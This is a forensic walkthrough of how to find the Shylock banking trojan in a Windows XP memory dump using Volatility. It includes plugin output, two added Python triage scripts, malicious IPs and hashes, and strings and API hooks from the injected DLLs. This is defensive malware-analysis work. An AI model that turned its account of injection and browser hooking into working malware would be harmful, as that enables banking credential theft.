Shylock via volatility

Shylock is a new financial malware, publicly reported for the first time on 7 September 2011. Additional information can be found in Mila's blog post: http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html

Tools

Essay

Memory Acquisition

The first step is memory acquisition, which can be accomplished essentially in two ways, depending on the environment you are dealing with. A first basic categorization could be:

  • Virtual Environment.
  • Physical Environment.

In the first case (depending on the virtual machine software used) we could acquire the memory simply by taking the corresponding memory file, like:

Vmware -> *.vmem

or by dumping the memory with proper tools. The tools approach is also used in the case of a physical environment. Let's see some of these tools.

Image Analysis

Once we have our memory dump, the second step is to identify the nature of the dump we have:

# python vol.py imageinfo -f infected.dmp

Volatile Systems Volatility Framework 2.1_alpha
Suggested Profile(s) : WinXPSP3x86, WinXPSP2x86 (Instantiated with WinXPSP2x86)
AS Layer1 : JKIA32PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/home/../infected.dmp)
PAE type : No PAE
DTB : 0x39000
KDBG : 0x8054c760L
KPCR : 0xffdff000L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2011-09-28 11:59:02
Image local date and time : 2011-09-28 11:59:02
Number of Processors : 1
Image Type :

We have Windows XP with Service Pack 2 on an x86 environment.

Acquiring information about the image, and consequently about the OS, is a task that should never be undervalued, because it gives us precious hints on how to handle certain artifacts.

Take, for instance, the network analysis plugins, which are OS dependent:

  • connscan -> XP Only
  • netscan -> Vista, 2008 or Windows 7

Process Analysis

Volatility offers various ways of enumerating processes; the first one is pslist:

# python vol.py pslist -f infected.dmp

Volatile Systems Volatility Framework 2.1_alpha
Offset(V) Name PID PPID Thds Hnds Time
---------- -------------------- ------ ------ ------ ------ -------------------
0x80eed020 System 4 0 54 258 1970-01-01 00:00:00
0xffb6d020 smss.exe 368 4 3 21 2011-09-28 11:56:51
0xffb5a3b8 csrss.exe 584 368 10 408 2011-09-28 11:56:52
0x80dd8c78 winlogon.exe 608 368 21 444 2011-09-28 11:56:52
0xffb37550 services.exe 652 608 16 259 2011-09-28 11:56:53
0xffb3bca8 lsass.exe 664 608 23 344 2011-09-28 11:56:53
0x80dacda0 VBoxService.exe 832 652 8 107 2011-09-28 11:56:53
0x80d826c8 svchost.exe 876 652 20 198 2011-09-28 11:56:53
0xffb50998 svchost.exe 960 652 9 222 2011-09-28 11:56:54
0x80e05020 svchost.exe 1052 652 68 1116 2011-09-28 11:56:54
0xffb64668 svchost.exe 1116 652 7 84 2011-09-28 11:56:55
0xffb74578 svchost.exe 1188 652 15 205 2011-09-28 11:56:55
0xffa6eda0 explorer.exe 1440 1400 26 499 2011-09-28 11:56:57
0x80d24a80 spoolsv.exe 1588 652 14 116 2011-09-28 11:56:57
0xffa79020 VBoxTray.exe 1672 1440 6 82 2011-09-28 11:56:58
0xffa7e6d8 ctfmon.exe 1680 1440 1 81 2011-09-28 11:56:58
0xffb4b790 alg.exe 1276 652 7 103 2011-09-28 11:57:11
0xffb8ebb8 wscntfy.exe 1372 1052 1 53 2011-09-28 11:57:12
0xffbbcda0 wuauclt.exe 220 1052 7 173 2011-09-28 11:57:55
0x80d4b1a8 firefox.exe 1336 1440 35 466 2011-09-28 11:58:52

Process enumeration in this case does not give us elements that evidence an infection. There is another good plugin, psxview, used for more in-depth inspection (it finds hidden processes by cross-referencing various process listings), but in this case we don't have process artifacts.

Network Activity

# python vol.py connscan -f infected.dmp

Volatile Systems Volatility Framework 2.1_alpha
Offset(P) Local Address Remote Address Pid
---------- ------------------------- ------------------------- ------
0x010f54e8 10.0.2.15:1058 63.245.209.93:80 1336
0x0111ea48 127.0.0.1:1051 127.0.0.1:1050 1336
0x0112f008 10.0.2.15:1057 63.245.209.93:80 1336
0x01132008 10.0.2.15:1060 213.92.11.90:80 1336
0x01137008 10.0.2.15:1059 213.92.11.90:80 1336
0x01139008 10.0.2.15:1049 209.190.4.82:443 1336
0x01141008 10.0.2.15:1053 63.245.209.165:443 1336
0x01c4f008 10.0.2.15:1057 63.245.209.93:80 1336
0x03c93008 127.0.0.1:1046 127.0.0.1:1047 1336
0x03df1a30 127.0.0.1:1050 127.0.0.1:1051 1336
0x03df2900 10.0.2.15:1045 209.190.4.82:443 1440
0x0508e008 10.0.2.15:1061 209.190.4.82:443 1440
0x09394008 10.0.2.15:1056 184.173.252.203:443 1336
0x0ae3a300 127.0.0.1:1047 127.0.0.1:1046 1336

As you can see, network activity is performed mainly by PID 1336 (firefox.exe), plus two entries by PID 1440 (explorer.exe).

Here comes the first suspect: it's unnatural for the explorer.exe process to produce network traffic.

The next step, obviously, is to check IP reputation; a quick search leads us to discover that 209.190.4.82 is malicious.

Is this enough?

No. Keeping in mind that malware often makes use of the browser process to exfiltrate data, let's check the IPs firefox is talking to.

The first IP, 63.245.209.93, is a well-known one: it belongs to Firefox itself.

  • 213.92.11.90 -> Clean.
  • 184.173.252.203 -> Malicious.

This implies that Firefox is also affected by some malicious activity.

We are in the presence of Shylock; more details here:

http://www.threatexpert.com/report.aspx?md5=7e609f34a7541a3e2f7c8e5aed955ff2

Timeline Analysis

Precious information can be gained from timeline analysis, which involves building a set of cross-references based on:

  • Catching the time of an event (start / end)
  • Linking the event to another one with similar characteristics

The first evidence of infection comes from the network connections, so this could be the first direction to follow.

Volatility has a plugin called sockets that prints out a list of open sockets. Let's take a global look at the sockets:

# python vol.py sockets -f infected.dmp

Volatile Systems Volatility Framework 2.1_alpha
Offset(V) PID Port Proto Address Create Time
---------- ------ ------ ------------------- -------------- --------------------------
0xffbab2f0 1052 123 17 UDP 10.0.2.15 2011-09-28 11:57:10
0xffbbf650 664 500 17 UDP 0.0.0.0 2011-09-28 11:57:06
0xffb32e98 4 445 6 TCP 0.0.0.0 2011-09-28 11:56:51
0xffb66220 960 135 6 TCP 0.0.0.0 2011-09-28 11:56:54
0x80d35d08 258 37927 855 - 0.0.0.0 1970-01-01 00:00:00
0xffba77a0 1188 1900 17 UDP 10.0.2.15 2011-09-28 11:57:11
0x80d32b78 4 139 6 TCP 10.0.2.15 2011-09-28 11:56:59
0x80d32b78 1336 1047 6 TCP 0.0.0.0 2011-09-28 11:58:53
0x80e2b3b8 1116 1052 17 UDP 0.0.0.0 2011-09-28 11:58:55
0x80e2de98 1052 123 17 UDP 127.0.0.1 2011-09-28 11:57:10
0xffbabe70 664 0 255 Reserved 0.0.0.0 2011-09-28 11:57:06
0x80e23e98 1336 1051 6 TCP 0.0.0.0 2011-09-28 11:58:55
0x80e23e98 1116 1025 17 UDP 0.0.0.0 2011-09-28 11:57:04
0x80d37650 4 137 17 UDP 10.0.2.15 2011-09-28 11:56:59
0x80e22da0 1336 1056 6 TCP 0.0.0.0 2011-09-28 11:58:57
0x80e32a70 1336 1046 6 TCP 127.0.0.1 2011-09-28 11:58:53
0x80e32a70 1336 1060 6 TCP 0.0.0.0 2011-09-28 11:59:02
0xffb86e98 1188 1900 17 UDP 127.0.0.1 2011-09-28 11:57:11
0x80e14e98 1336 1050 6 TCP 127.0.0.1 2011-09-28 11:58:55
0x80e14e98 664 4500 17 UDP 0.0.0.0 2011-09-28 11:57:06
0xffb33978 4 445 17 UDP 0.0.0.0 2011-09-28 11:56:51
0xffb33978 4 138 17 UDP 10.0.2.15 2011-09-28 11:56:59
0xffa078e0 1276 1031 6 TCP 127.0.0.1 2011-09-28 11:57:11
0xffa078e0 1440 1045 6 TCP 0.0.0.0 2011-09-28 11:58:04
0x80e23220 1336 1049 6 TCP 0.0.0.0 2011-09-28 11:58:54

Since we are interested only in certain processes, let's filter on the PID:

# python vol.py sockets -f infected.dmp | grep 1440

Volatile Systems Volatility Framework 2.1_alpha
Offset(V) PID Port Proto Address Create Time
---------- ------ ------ ------------------- -------------- --------------------------
0xffa078e0 1440 1045 6 TCP 0.0.0.0 2011-09-28 11:58:04

We gain an additional piece of information: the socket in explorer.exe appeared at 11:58:04.

The next entry, as you can see, belongs to PID 1336 (firefox) and port 1049.

0x80e23220 1336 1049 6 TCP 0.0.0.0 2011-09-28 11:58:54

The time here is 11:58:54, so after the explorer.exe socket creation. According to connscan we also have another malicious IP, which can be distinguished by the port number 1056; searching through the open sockets we have:

0x80e22da0 1336 1056 6 TCP 0.0.0.0 2011-09-28 11:58:57

So that is 11:58:57.

The earliest malicious timing is given by explorer's socket; "immediately" after, the Firefox activity occurs.

This observation profiles a classical malware behavior: the malicious executable injects code into the explorer process, and subsequently some piece of code is injected into the browser process.
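As an added example (not part of the original post), the following Python script joins the connscan and sockets rows shown above into the same timeline the text builds by hand. The sample rows are a subset copied from the output above for PIDs 1440 and 1336; the set of malicious IPs is the one the post derived from its reputation checks, and the parsing regexes assume the column layout of Volatility 2.1 text output. It goes one step beyond the text: a connection whose socket has no matching create time (like explorer's port 1061, absent from the sockets list) is kept and reported as unknown rather than silently dropped.

```python
"""Correlate Volatility connscan and sockets output into a small timeline.

Added example, not part of the original post. The rows below are copied
from the connscan and sockets output shown above for explorer.exe (1440)
and firefox.exe (1336); the malicious IP set is the one the post reports.
"""
import re
from datetime import datetime

CONNSCAN = """\
0x01139008 10.0.2.15:1049 209.190.4.82:443 1336
0x03df2900 10.0.2.15:1045 209.190.4.82:443 1440
0x0508e008 10.0.2.15:1061 209.190.4.82:443 1440
0x09394008 10.0.2.15:1056 184.173.252.203:443 1336
0x010f54e8 10.0.2.15:1058 63.245.209.93:80 1336
"""

SOCKETS = """\
0xffa078e0 1440 1045 6 TCP 0.0.0.0 2011-09-28 11:58:04
0x80e23220 1336 1049 6 TCP 0.0.0.0 2011-09-28 11:58:54
0x80e22da0 1336 1056 6 TCP 0.0.0.0 2011-09-28 11:58:57
0x80e32a70 1336 1060 6 TCP 0.0.0.0 2011-09-28 11:59:02
"""

# IPs the post flagged as malicious after its reputation lookups.
MALICIOUS_IPS = {"209.190.4.82", "184.173.252.203"}

# connscan row: Offset(P) Local Remote Pid
CONN_RE = re.compile(r"^0x[0-9a-f]+\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\d+)$")
# sockets row: Offset(V) PID Port Proto ProtoName Address CreateTime
SOCK_RE = re.compile(
    r"^0x[0-9a-f]+\s+(\d+)\s+(\d+)\s+\d+\s+\S+\s+\S+\s+"
    r"(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)$"
)


def parse_connscan(text):
    """Return {(pid, local_port): remote_ip} from connscan body rows."""
    conns = {}
    for line in text.splitlines():
        m = CONN_RE.match(line.strip())
        if m:
            _lip, lport, rip, _rport, pid = m.groups()
            conns[(int(pid), int(lport))] = rip
    return conns


def parse_sockets(text):
    """Return {(pid, port): create_time} from sockets body rows."""
    socks = {}
    for line in text.splitlines():
        m = SOCK_RE.match(line.strip())
        if m:
            pid, port, ts = m.groups()
            socks[(int(pid), int(port))] = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
    return socks


def malicious_timeline(connscan_text, sockets_text, bad_ips):
    """Join connections to bad IPs with their socket creation time, oldest first.

    Each entry is (create_time, pid, local_port, remote_ip). A connection whose
    socket has no create time in the sockets output gets None and sorts last,
    so it stays visible instead of being dropped.
    """
    conns = parse_connscan(connscan_text)
    socks = parse_sockets(sockets_text)
    events = []
    for (pid, lport), rip in conns.items():
        if rip in bad_ips:
            events.append((socks.get((pid, lport)), pid, lport, rip))
    events.sort(key=lambda e: (e[0] is None, e[0] or datetime.min))
    return events


if __name__ == "__main__":
    for ts, pid, lport, rip in malicious_timeline(CONNSCAN, SOCKETS, MALICIOUS_IPS):
        print(ts or "unknown time       ", pid, lport, rip)
```

Run against the rows above, the first event is explorer's port 1045 at 11:58:04, followed by firefox's ports 1049 (11:58:54) and 1056 (11:58:57), which is exactly the ordering the text reasons about.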

Dll Inspection

Enumerating the DLLs loaded by a process could give some useful hints about the genuineness of the process. Here is the list of DLLs loaded by explorer:

# python vol.py dlllist -f infected.dmp -p 1440
Volatile Systems Volatility Framework 2.1_alpha
************************************************************************
explorer.exe pid: 1440
Command line : C:\WINDOWS\Explorer.EXE
Service Pack 2

Base Size Path
0x01000000 0x0ff000 C:\WINDOWS\Explorer.EXE
0x7c910000 0x0b6000 C:\WINDOWS\system32\ntdll.dll
0x7c800000 0x0ff000 C:\WINDOWS\system32\kernel32.dll
0x77be0000 0x058000 C:\WINDOWS\system32\msvcrt.dll
0x77f40000 0x0ab000 C:\WINDOWS\system32\ADVAPI32.dll
0x77da0000 0x091000 C:\WINDOWS\system32\RPCRT4.dll
0x77e40000 0x046000 C:\WINDOWS\system32\GDI32.dll
0x77d10000 0x090000 C:\WINDOWS\system32\USER32.dll
0x77e90000 0x076000 C:\WINDOWS\system32\SHLWAPI.dll
0x7c9d0000 0x81b000 C:\WINDOWS\system32\SHELL32.dll
0x774b0000 0x13c000 C:\WINDOWS\system32\ole32.dll
0x770f0000 0x08c000 C:\WINDOWS\system32\OLEAUT32.dll
0x75f30000 0x0fc000 C:\WINDOWS\system32\BROWSEUI.dll
0x77730000 0x16c000 C:\WINDOWS\system32\SHDOCVW.dll
0x77a50000 0x095000 C:\WINDOWS\system32\CRYPT32.dll
0x77af0000 0x012000 C:\WINDOWS\system32\MSASN1.dll
0x76890000 0x083000 C:\WINDOWS\system32\CRYPTUI.dll
0x76bf0000 0x02e000 C:\WINDOWS\system32\WINTRUST.dll
0x76c50000 0x028000 C:\WINDOWS\system32\IMAGEHLP.dll
0x5bc70000 0x054000 C:\WINDOWS\system32\NETAPI32.dll
0x77180000 0x0a7000 C:\WINDOWS\system32\WININET.dll
0x76f20000 0x02d000 C:\WINDOWS\system32\WLDAP32.dll
0x77bd0000 0x008000 C:\WINDOWS\system32\VERSION.dll
0x5b180000 0x038000 C:\WINDOWS\system32\UxTheme.dll
0x5cf90000 0x026000 C:\WINDOWS\system32\ShimEng.dll
0x596b0000 0x1ca000 C:\WINDOWS\AppPatch\AcGenral.DLL
0x76b00000 0x02e000 C:\WINDOWS\system32\WINMM.dll
0x77bb0000 0x015000 C:\WINDOWS\system32\MSACM32.dll
0x76980000 0x0b4000 C:\WINDOWS\system32\USERENV.dll
0x773a0000 0x102000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9\comctl32.dll
0x5d4d0000 0x097000 C:\WINDOWS\system32\comctl32.dll
0x77b10000 0x022000 C:\WINDOWS\system32\appHelp.dll
0x76f90000 0x07f000 C:\WINDOWS\system32\CLBCATQ.DLL
0x77010000 0x0d2000 C:\WINDOWS\system32\COMRes.dll
0x779f0000 0x055000 C:\WINDOWS\System32\cscui.dll
0x765b0000 0x01d000 C:\WINDOWS\System32\CSCDLL.dll
0x5ba40000 0x072000 C:\WINDOWS\System32\themeui.dll
0x77f10000 0x011000 C:\WINDOWS\System32\Secur32.dll
0x76330000 0x005000 C:\WINDOWS\System32\MSIMG32.dll
0x20000000 0x2d5000 C:\WINDOWS\system32\xpsp2res.dll
0x71cd0000 0x01c000 C:\WINDOWS\System32\actxprxy.dll
0x60060000 0x033000 C:\WINDOWS\System32\msutb.dll
0x746b0000 0x04b000 C:\WINDOWS\System32\MSCTF.dll
0x71b80000 0x013000 C:\WINDOWS\system32\SAMLIB.dll
0x778f0000 0x0f7000 C:\WINDOWS\system32\SETUPAPI.dll
0x77230000 0x09d000 C:\WINDOWS\system32\urlmon.dll
0x763b0000 0x1a9000 C:\WINDOWS\system32\NETSHELL.dll
0x76e40000 0x00e000 C:\WINDOWS\system32\rtutils.dll
0x76bc0000 0x02e000 C:\WINDOWS\system32\credui.dll
0x71a30000 0x017000 C:\WINDOWS\system32\WS2_32.dll
0x71a20000 0x008000 C:\WINDOWS\system32\WS2HELP.dll
0x76ae0000 0x011000 C:\WINDOWS\system32\ATL.DLL
0x76d20000 0x019000 C:\WINDOWS\system32\iphlpapi.dll
0x71aa0000 0x012000 C:\WINDOWS\system32\MPR.dll
0x10000000 0x0b7000 C:\WINDOWS\System32\VBoxMRXNP.dll
0x75f10000 0x007000 C:\WINDOWS\System32\drprov.dll
0x71ba0000 0x00e000 C:\WINDOWS\System32\ntlanman.dll
0x71c60000 0x017000 C:\WINDOWS\System32\NETUI0.dll
0x71c20000 0x040000 C:\WINDOWS\System32\NETUI1.dll
0x71c10000 0x007000 C:\WINDOWS\System32\NETRAP.dll
0x75f20000 0x009000 C:\WINDOWS\System32\davclnt.dll
0x76310000 0x010000 C:\WINDOWS\system32\WINSTA.dll
0x74ac0000 0x047000 C:\WINDOWS\System32\webcheck.dll
0x71a50000 0x00a000 C:\WINDOWS\System32\WSOCK32.dll
0x761e0000 0x021000 C:\WINDOWS\System32\stobject.dll
0x74a80000 0x00a000 C:\WINDOWS\System32\BatMeter.dll
0x74a60000 0x008000 C:\WINDOWS\System32\POWRPROF.dll
0x76f10000 0x008000 C:\WINDOWS\System32\WTSAPI32.dll
0x72c90000 0x009000 C:\WINDOWS\system32\wdmaud.drv
0x72c80000 0x008000 C:\WINDOWS\system32\msacm32.drv
0x77ba0000 0x007000 C:\WINDOWS\system32\midimap.dll
0x0ffd0000 0x028000 C:\WINDOWS\system32\rsaenh.dll
0x76bb0000 0x00b000 C:\WINDOWS\system32\Psapi.dll
0x76ea0000 0x03c000 C:\WINDOWS\system32\RASAPI32.DLL
0x76e50000 0x012000 C:\WINDOWS\system32\rasman.dll
0x76e70000 0x02f000 C:\WINDOWS\system32\TAPI32.dll
0x767b0000 0x027000 C:\WINDOWS\system32\schannel.dll
0x719d0000 0x040000 C:\WINDOWS\System32\mswsock.dll
0x76ee0000 0x027000 C:\WINDOWS\system32\DNSAPI.dll
0x76f80000 0x006000 C:\WINDOWS\system32\rasadhlp.dll
0x66750000 0x058000 C:\WINDOWS\system32\hnetcfg.dll
0x71a10000 0x008000 C:\WINDOWS\System32\wshtcpip.dll
0x68100000 0x024000 C:\WINDOWS\system32\dssenh.dll
0x76590000 0x013000 C:\WINDOWS\system32\cryptnet.dll
0x4d530000 0x058000 C:\WINDOWS\system32\WINHTTP.dll
0x72240000 0x005000 C:\WINDOWS\system32\SensApi.dll
0x750e0000 0x014000 C:\WINDOWS\system32\Cabinet.dll
0x76940000 0x008000 C:\WINDOWS\system32\LINKINFO.dll
0x76950000 0x026000 C:\WINDOWS\system32\ntshrui.dll

Among the various entries, there are some that look suspicious:

  • WINHTTP.dll
  • DNSAPI.dll
  • cryptnet.dll
  • hnetcfg.dll
  • wshtcpip.dll

explorer.exe normally does not need networking modules like WINHTTP or cryptnet, so this should raise some suspicion.

Finding Injected Code

According to the previous information we can move on to looking for injected code in explorer.exe.

Here one of the most handy Volatility plugins, malfind, comes to great help:

# python vol.py malfind -f infected.dmp -p 1440 -D /home/.../injected_code/
Volatile Systems Volatility Framework 2.1_alpha
Name Pid Start End Tag Hits Protect
explorer.exe 1440 0x01820000 0x18abfff0 VadS 0 PAGE_EXECUTE_READWRITE
Dumped to: /home/.../injected_code/explorer.exe.9d8bda0.01820000-018abfff.dmp
0x01820000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ..............
0x01820010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0x01820020 00 00 00 00 00 00 00 00 00 00 60 01 00 66 08 00 ..........`..f..
0x01820030 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 ................
0x01820040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 ........!..L.!Th
0x01820050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f is program canno
0x01820060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 t be run in DOS
0x01820070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 mode....$.......

explorer.exe 1440 0x01d30000 0x1dbbfff0 VadS 0 PAGE_EXECUTE_READWRITE
Dumped to: /home/.../injected_code/explorer.exe.9d8bda0.01d30000-01dbbfff.dmp
0x01d30000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ..............
0x01d30010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0x01d30020 00 00 00 00 00 00 00 00 00 00 bd 01 00 66 08 00 .............f..
0x01d30030 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 ................
0x01d30040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 ........!..L.!Th
0x01d30050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f is program canno
0x01d30060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 t be run in DOS
0x01d30070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 mode....$.......

Great! malfind caught and carved two executables for us.

# file explorer.exe.9d8bda0.01820000-018abfff.dmp
explorer.exe.9d8bda0.01820000-018abfff.dmp: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

# file explorer.exe.9d8bda0.01d30000-01dbbfff.dmp
explorer.exe.9d8bda0.01d30000-01dbbfff.dmp: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

We have two DLLs.

# md5sum explorer.exe.9d8bda0.01820000-018abfff.dmp
2eb2380efe9c3a5db32a9adba55834b9 explorer.exe.9d8bda0.01820000-018abfff.dmp

and

# md5sum explorer.exe.9d8bda0.01d30000-01dbbfff.dmp
b29d99b940b8a62464032ddbf395f0d8 explorer.exe.9d8bda0.01d30000-01dbbfff.dmp

Despite having the same length, the two DLLs are different.
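The triage rule the text applies here (private VadS region, PAGE_EXECUTE_READWRITE, bytes starting with an MZ header) can be automated over malfind's text output. The following Python script is an added example, not code from the original post or from Volatility: it parses the malfind output for explorer.exe shown above (the two region headers and their hex dumps, copied verbatim), reassembles the dumped bytes, checks for the DOS signature and reads e_lfanew at offset 0x3c, and flags the regions that match all three conditions. The regexes assume the column layout of Volatility 2.1 malfind output, with 16 bytes per hex-dump row.

```python
"""Triage malfind output: flag RWX private regions whose bytes start with a PE header.

Added example, not part of the original post. MALFIND_OUTPUT is the malfind
output for explorer.exe shown above; the plugin prints only the first 0x80
bytes of each region, which is enough to cover the DOS header.
"""
import re
import struct

MALFIND_OUTPUT = """\
explorer.exe 1440 0x01820000 0x18abfff0 VadS 0 PAGE_EXECUTE_READWRITE
Dumped to: /home/.../injected_code/explorer.exe.9d8bda0.01820000-018abfff.dmp
0x01820000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ..............
0x01820010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0x01820020 00 00 00 00 00 00 00 00 00 00 60 01 00 66 08 00 ..........`..f..
0x01820030 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 ................
0x01820040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 ........!..L.!Th
0x01820050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f is program canno
0x01820060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 t be run in DOS
0x01820070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 mode....$.......

explorer.exe 1440 0x01d30000 0x1dbbfff0 VadS 0 PAGE_EXECUTE_READWRITE
Dumped to: /home/.../injected_code/explorer.exe.9d8bda0.01d30000-01dbbfff.dmp
0x01d30000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ..............
0x01d30010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0x01d30020 00 00 00 00 00 00 00 00 00 00 bd 01 00 66 08 00 .............f..
0x01d30030 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 ................
0x01d30040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 ........!..L.!Th
0x01d30050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f is program canno
0x01d30060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 t be run in DOS
0x01d30070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 mode....$.......
"""

# Region header: Name Pid Start End Tag Hits Protect
HEADER_RE = re.compile(
    r"^(\S+)\s+(\d+)\s+0x([0-9a-f]+)\s+0x([0-9a-f]+)\s+(\S+)\s+\d+\s+(\S+)$"
)
# Hex-dump row: address, exactly 16 byte values, then the ASCII column.
HEX_RE = re.compile(r"^0x[0-9a-f]{8}((?:\s[0-9a-f]{2}){16})")


def parse_malfind(text):
    """Group malfind output into regions, each with its reassembled bytes."""
    regions = []
    for line in text.splitlines():
        line = line.strip()
        m = HEADER_RE.match(line)
        if m:
            name, pid, start, _end, tag, protect = m.groups()
            regions.append({"name": name, "pid": int(pid), "start": int(start, 16),
                            "tag": tag, "protect": protect, "bytes": bytearray()})
            continue
        m = HEX_RE.match(line)
        if m and regions:
            regions[-1]["bytes"] += bytes.fromhex(m.group(1).strip())
    return regions


def pe_header_info(data):
    """Return (has_mz, e_lfanew) for a region's leading bytes; (False, None) if no DOS header."""
    if len(data) < 0x40 or bytes(data[:2]) != b"MZ":
        return (False, None)
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # offset of the PE header
    return (True, e_lfanew)


def triage(text):
    """Flag regions that are private (VadS), RWX and carry a DOS/PE header."""
    findings = []
    for r in parse_malfind(text):
        has_mz, e_lfanew = pe_header_info(r["bytes"])
        suspicious = (r["tag"] == "VadS"
                      and r["protect"] == "PAGE_EXECUTE_READWRITE"
                      and has_mz)
        findings.append({"pid": r["pid"], "start": r["start"], "pe": has_mz,
                         "e_lfanew": e_lfanew, "suspicious": suspicious})
    return findings


if __name__ == "__main__":
    for f in triage(MALFIND_OUTPUT):
        print("pid %d region 0x%08x PE=%s e_lfanew=%s suspicious=%s"
              % (f["pid"], f["start"], f["pe"], f["e_lfanew"], f["suspicious"]))
```

Both regions come out as suspicious with e_lfanew = 0xf0, which is consistent with the `file` output above identifying the dumps as PE32 DLLs; the script only flags, so a region that fails the MZ check (shellcode rather than a mapped image) is still listed, just not marked.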

Here are some interesting strings from the carved executables:

*Install=>::pGUID=%s bResult=%u Inst.m_strStarterFullName=%s
***ERROR::Wininet::HttpAllowUnauthorityCertificate::InternetSetOption GetLastError=%d
..
Bad size of the file of a inject.
Bad signature of the file of a inject.
Bad control sum of the file of a inject.
..
****************** Injects received MASTER ******************
****************** Injects received SLAVE ******************
..
EX_Hook::CreateProcessA ApplicationName=%s
EX_Hook::CreateProcessA CommandLine=%s
EX_Hook::CreateProcessA lCurrentDirectory=%s
EX_Hook::CreateProcessA Module:%s
EX_Hook::CreateProcessW ApplicationName=%ws
EX_Hook::CreateProcessW CommandLine=%ws
EX_Hook::CreateProcessW lCurrentDirectory=%ws
EX_Hook::CreateProcessW Module:%s

In addition to these strings, there are two groups of very explicit strings that add details to the puzzle; here is a selection of them:

First Group

FF::PR_ReadHook entry
FF::ReqIsRequest FOUND fd=%08X m_isBotInfo=%u m_isInject=%u m_isContentTextXml=%u
FF::PR_WriteHook entry
FF::PR_CloseHook
FF::CERT_VerifyCertNameHook entry
FF::CERT_VerifyCertNowHook entry
FF_Hook::CERT_VerifyCertNamePtr=%08X

As should be clear, these hooks belong to the Firefox browser.

Second Group

IE_Hook::GetReplayInfo entry
IE::ReqFindRequest FOUND hOpenRequest=%08X m_hRequestFake=%u m_isBotInfo=%u m_isInject=%u m_isContentTextXml=%u
IE::InternetReadFile
IE::InternetReadFileExA
IE::InternetReadFileExW
HttpOpenRequestA hook FAIL
HttpOpenRequestW hook FAIL
HttpSendRequestA hook FAIL
HttpSendRequestW hook FAIL
InternetReadFile
InternetReadFile hook FAIL
InternetReadFileExA hook FAIL
InternetQueryDataAvailable hook FAIL
InternetSetStatusCallback hook FAIL

According to the strings, Shylock targets Internet Explorer too; additionally, we have a list of hooked functions.

VAD Overview

According to malfind, we have two portions of memory that host malicious code:

Name Pid Start End Tag Hits Protect
explorer.exe 1440 0x01820000 0x18abfff0 VadS 0 PAGE_EXECUTE_READWRITE
explorer.exe 1440 0x01d30000 0x1dbbfff0 VadS 0 PAGE_EXECUTE_READWRITE

Both blocks of code have the classical and ideal memory protection PAGE_EXECUTE_READWRITE, which allows a piece of code to run and write to itself (for example in the case of layered encrypted code).

Additional information can be obtained by inspecting the VAD.

The VadS tag corresponds to _MMVAD_SHORT, the only one of the VAD structures (the others being the regular and long forms) that does not contain the CONTROL_AREA structure.

More information about the VAD is reported here: www.dfrws.org/2007/proceedings/p62-dolan-gavitt_pres.pdf

For our purposes it's important to note that code injection via VirtualAllocEx/WriteProcessMemory leaves a VadS tag as evidence.

# python vol.py vadinfo -f infected.dmp -p 1440

VAD node @80e1ea48 Start 01820000 End 018abfff Tag VadS
Flags: MemCommit, PrivateMemory
Commit Charge: 140 Protection: 6
..
VAD node @ffa63a68 Start 01d30000 End 01dbbfff Tag VadS
Flags: MemCommit, PrivateMemory
Commit Charge: 140 Protection: 6

Revealing Hooks

In this paragraph we will see two different memory dumps belonging to two different samples of Shylock. This is because in some cases (probably with earlier Shylock versions) the explorer.exe hook list is not complete.

Hooks can be easily detected via the apihooks plugin.

First Case

These are the APIs hooked by the previously analyzed sample.

# python vol.py apihooks -f infected.dmp -p 1440

Volatile Systems Volatility Framework 2.1_alpha
Name Type Target Value
explorer.exe[1440]@stobject.dll iat USER32.dll!GetMessageW 0x0 0x184e6f5 (UNKNOWN)
explorer.exe[1440] eat user32.dll!ExitWindowsEx[0x184e56aL] 0x0 0x184e56a (UNKNOWN)
explorer.exe[1440] eat user32.dll!GetMessageW[0x184e6f5L] 0x0 0x184e6f5 (UNKNOWN)
explorer.exe[1440]@credui.dll iat USER32.dll!GetMessageW 0x0 0x184e6f5 (UNKNOWN)
explorer.exe[1440]@msacm32.drv iat USER32.dll!GetMessageW 0x0 0x184e6f5 (UNKNOWN)
